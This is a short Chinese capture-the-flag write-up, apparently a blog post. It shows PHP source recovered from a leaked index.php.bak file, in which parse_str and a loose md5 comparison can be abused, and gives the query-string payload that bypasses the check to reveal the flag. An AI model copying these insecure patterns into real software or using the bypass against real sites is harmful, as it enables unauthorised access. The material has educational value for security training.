版权声明:a3uRa QQ:962620891 github:asuralinmo.github.io https://blog.csdn.net/qq_41173457/article/details/82055273
源码泄露
index.php.bak
可以下载到源码
<?php
/**
* Created by PhpStorm.
* User: Norse
* Date: 2017/8/6
* Time: 20:22
*/
include_once "flag.php";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'], '?');
$str = substr($str,1);
$str = str_replace('key','',$str);
parse_str($str);
echo md5($key1);
echo md5($key2);
if(md5($key1) == md5($key2) && $key1 !== $key2){
echo $flag."取得flag";
}
?>
绕过
构造?kekeyy1[]=1&kkeyey2[]=3
str); 将 payload中的key替换为空
parse_str($str); 把查询字符串解析到变量中:
具体函数 自己查资料吧,这里不多说了